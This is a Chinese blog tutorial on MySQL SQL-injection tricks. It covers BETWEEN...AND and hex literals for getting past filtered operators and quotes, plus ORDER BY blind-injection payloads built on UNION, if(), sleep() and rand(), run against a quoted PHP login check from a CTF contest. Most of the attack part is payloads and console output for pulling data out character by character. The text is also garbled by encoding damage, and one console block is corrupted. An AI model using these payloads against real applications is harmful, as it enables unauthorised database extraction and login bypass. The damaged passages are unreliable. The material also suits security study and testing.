前言
最近發(fā)現(xiàn)了兩個(gè)關(guān)于sql注入的小trick,分享一下.下面話不多說了,來一起看看詳細(xì)的介紹吧
between and 操作符代替比較符
操作符 BETWEEN … AND 會(huì)選取介于兩個(gè)值之間的數(shù)據(jù)范圍。這些值可以是數(shù)值、文本或者日期。
between and有數(shù)據(jù)比較功能
exp1 between min and max
如果exp1的結(jié)果處于min和max之間,`between and`就返回`1`,反之返回`0`.
示例
mysql> select * from user;
+----+----------+----------------------------------+-------------------+
| id | username | password | email |
+----+----------+----------------------------------+-------------------+
| 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
| 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
| 3 | admin | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com |
| 4 | add | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
+----+----------+----------------------------------+-------------------+
mysql> select * from user where id between 1 and 2;
+----+----------+----------------------------------+-------------------+
| id | username | password | email |
+----+----------+----------------------------------+-------------------+
| 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
| 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
+----+----------+----------------------------------+-------------------+
大多數(shù)數(shù)據(jù)庫(kù)都支持between and操作,但是對(duì)于邊界的處理有所不同,在mysql中,between and 是包含邊界的,在數(shù)學(xué)中也就是[min,max]
在盲注中應(yīng)用
between and可以用來在過濾了=,like, regexp,>,的情況下使用.
mysql> select database();
+------------+
| database() |
+------------+
| test |
+------------+
1 row in set (0.00 sec)
1. 配合截取函數(shù)使用
mysql> select mid(database(),1,1) between 'a' and 'a' ;
+-----------------------------------------+
| mid(database(),1,1) between 'a' and 'a' |
+-----------------------------------------+
| 0 |
+-----------------------------------------+
1 row in set (0.00 sec)
mysql> select mid(database(),1,1) between 't' and 't' ;
+-----------------------------------------+
| mid(database(),1,1) between 't' and 't' |
+-----------------------------------------+
| 1 |
+-----------------------------------------+
1 row in set (0.00 sec)
2. 截取函數(shù)被過濾
表達(dá)式
select exp between min and max
在截取字符函數(shù)被過濾的時(shí)候,設(shè)置min和 max的方式有所改變.
測(cè)試1
mysql> select 'b' between 'a' and 'c';
+-------------------------+
| 'b' between 'a' and 'c' |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)
mysql> select 'b' between 'a' and 'b';
+-------------------------+
| 'b' between 'a' and 'b' |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)
mysql> select 'b' between 'b' and 'c';
+-------------------------+
| 'b' between 'b' and 'c' |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)
測(cè)試2
mysql> select 'bcd' between 'a' and 'c';
+---------------------------+
| 'bcd' between 'a' and 'c' |
+---------------------------+
| 1 |
+---------------------------+
1 row in set (0.00 sec)
mysql> select 'bcd' between 'a' and 'b';
+---------------------------+
| 'bcd' between 'a' and 'b' |
+---------------------------+
| 0 |
+---------------------------+
1 row in set (0.00 sec)
mysql> select 'bcd' between 'b' and 'c';
+---------------------------+
| 'bcd' between 'b' and 'c' |
+---------------------------+
| 1 |
+---------------------------+
1 row in set (0.00 sec)
由測(cè)試可知,當(dāng)exp為單個(gè)字符時(shí)三種區(qū)間返回值都是1,但是當(dāng)exp為字符串時(shí),當(dāng)區(qū)間為a-b時(shí),返回值為0.區(qū)間為a-c或者b-c時(shí),返回值為1.
也就是在進(jìn)行字符串比較時(shí),只會(huì)包含一邊的值,也就是[b,c).
所以在實(shí)際利用時(shí),就要注意區(qū)間的范圍.
實(shí)際測(cè)試
mysql> select database() between 'a' and 'z';
+--------------------------------+
| database() between 'a' and 'z' |
+--------------------------------+
| 1 |
+--------------------------------+
1 row in set (0.05 sec)
...
mysql> select database() between 't' and 'z';
+--------------------------------+
| database() between 't' and 'z' |
+--------------------------------+
| 1 |
+--------------------------------+
1 row in set (0.00 sec)
mysql> select database() between 'u' and 'z';
+--------------------------------+
| database() between 'u' and 'z' |
+--------------------------------+
| 0 |
+--------------------------------+
1 row in set (0.00 sec)
由結(jié)果可知,第一個(gè)字符為t
第二個(gè)字符
mysql> select database() between 'tatest
+----------------------------------+test
| database() between 'ta' and 'tz' |test
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select database() between 'te' and 'tz';
+----------------------------------+
| database() between 'te' and 'tz' |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select database() between 'tf' and 'tz';
+----------------------------------+
| database() between 'tf' and 'tz' |
+----------------------------------+
| 0 |
+----------------------------------+
1 row in set (0.00 sec)
剩下的以此類推.最終為test.
3. 單引號(hào)被過濾
between and還支持16進(jìn)制,所以可以用16進(jìn)制,來繞過單引號(hào)的過濾.
測(cè)試
mysql> select database() between 0x61 and 0x7a; //select database() between 'a' and 'z';
+----------------------------------+
| database() between 0x61 and 0x7a |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select database() between 0x74 and 0x7a; //select database() between 't' and 'z';
+----------------------------------+
| database() between 0x74 and 0x7a |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select database() between 0x75 and 0x7a; //select database() between 'u' and 'z';
+----------------------------------+
| database() between 0x75 and 0x7a |
+----------------------------------+
| 0 |
+----------------------------------+
1 row in set (0.00 sec)
了解order by
order by是mysql中對(duì)查詢數(shù)據(jù)進(jìn)行排序的方法,
使用示例
select * from 表名 order by 列名(或者數(shù)字) asc;升序(默認(rèn)升序)
select * from 表名 order by 列名(或者數(shù)字) desc;降序
這里的重點(diǎn)在于order by后既可以填列名或者是一個(gè)數(shù)字。舉個(gè)例子:
id是user表的第一列的列名,那么如果想根據(jù)id來排序,有兩種寫法:
select * from user order by id;
selecr * from user order by 1;
order by盲注
結(jié)合union來盲注
這個(gè)是在安恒杯月賽上看到的。
后臺(tái)關(guān)鍵代碼
$sql = 'select * from admin where username='".$username."'';
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if(isset($row)row['username']!="admin"){
$hit="username error!";
}else{
if ($row['password'] === $password){
$hit="";
}else{
$hit="password error!";
}
}
payload
username=admin' union 1,2,'字符串' order by 3
sql語(yǔ)句就變?yōu)?/p>
select * from admin where username='admin' or 1 union select 1,2,binary '字符串' order by 3;
這里就會(huì)對(duì)第三列進(jìn)行比較,即將字符串和密碼進(jìn)行比較。然后就可以根據(jù)頁(yè)面返回的不同情況進(jìn)行盲注。
注意的是最好加上binary,因?yàn)閛rder by比較的時(shí)候不區(qū)分大小寫。
基于if()盲注
需要知道列名
order by的列不同,返回的頁(yè)面當(dāng)然也是不同的,所以就可以根據(jù)排序的列不同來盲注。
示例:
order by if(1=1,id,username);
這里如果使用數(shù)字代替列名是不行的,因?yàn)閕f語(yǔ)句返回的是字符類型,不是整型。
不需要知道列名
payload
order by if(表達(dá)式,1,(select id from information_schema.tables))
如果表達(dá)式為false時(shí),sql語(yǔ)句會(huì)報(bào)ERROR 1242 (21000): Subquery returns more than 1 row的錯(cuò)誤,導(dǎo)致查詢內(nèi)容為空,如果表達(dá)式為true是,則會(huì)返回正常的頁(yè)面。
基于時(shí)間的盲注
payload
order by if(1=1,1,sleep(1))
測(cè)試結(jié)果
select * from ha order by if(1=1,1,sleep(1)); #正常時(shí)間
select * from ha order by if(1=2,1,sleep(1)); #有延遲
測(cè)試的時(shí)候發(fā)現(xiàn)延遲的時(shí)間并不是sleep(1)中的1秒,而是大于1秒。
最后發(fā)現(xiàn)延遲的時(shí)間和所查詢的數(shù)據(jù)的條數(shù)是成倍數(shù)關(guān)系的。
計(jì)算公式:
延遲時(shí)間=sleep(1)的秒數(shù)*所查詢數(shù)據(jù)條數(shù)
我所測(cè)試的ha表中有五條數(shù)據(jù),所以延遲了5秒。如果查詢的數(shù)據(jù)很多時(shí),延遲的時(shí)間就會(huì)很長(zhǎng)了。
在寫腳本時(shí),可以添加timeout這一參數(shù)來避免延遲時(shí)間過長(zhǎng)這一情況。
基于rang()的盲注
原理不贅述了,直接看測(cè)試結(jié)果
mysql> select * from ha order by rand(true);
+----+------+
| id | name |
+----+------+
| 9 | NULL |
| 6 | NULL |
| 5 | NULL |
| 1 | dss |
| 0 | dasd |
+----+------+
mysql> select * from ha order by rand(false);
+----+------+
| id | name |
+----+------+
| 1 | dss |
| 6 | NULL |
| 0 | dasd |
| 5 | NULL |
| 9 | NULL |
+----+------+
可以看到當(dāng)rang()為true和false時(shí),排序結(jié)果是不同的,所以就可以使用rang()函數(shù)進(jìn)行盲注了。
例
order by rand(ascii(mid((select database()),1,1))>96)
后記
order by注入在crf里其實(shí)出現(xiàn)挺多了,一直沒有總結(jié)過.這次比較全的整理了一下(自認(rèn)為比較全.XD),就和between and一起發(fā)出來了.歡迎師傅交流學(xué)習(xí).
好了,以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問大家可以留言交流,謝謝大家對(duì)腳本之家的支持。
您可能感興趣的文章:- 利用SQL注入漏洞登錄后臺(tái)的實(shí)現(xiàn)方法
- php中防止SQL注入的最佳解決方法
- PHP中防止SQL注入實(shí)現(xiàn)代碼
- php防止SQL注入詳解及防范
- PHP+MySQL 手工注入語(yǔ)句大全 推薦
- 整理比較全的Access SQL注入?yún)⒖?/li>
- 利用SQL注入漏洞拖庫(kù)的方法
- C#防SQL注入代碼的三種方法
- 防止xss和sql注入:JS特殊字符過濾正則
- PHP中防止SQL注入攻擊和XSS攻擊的兩個(gè)簡(jiǎn)單方法
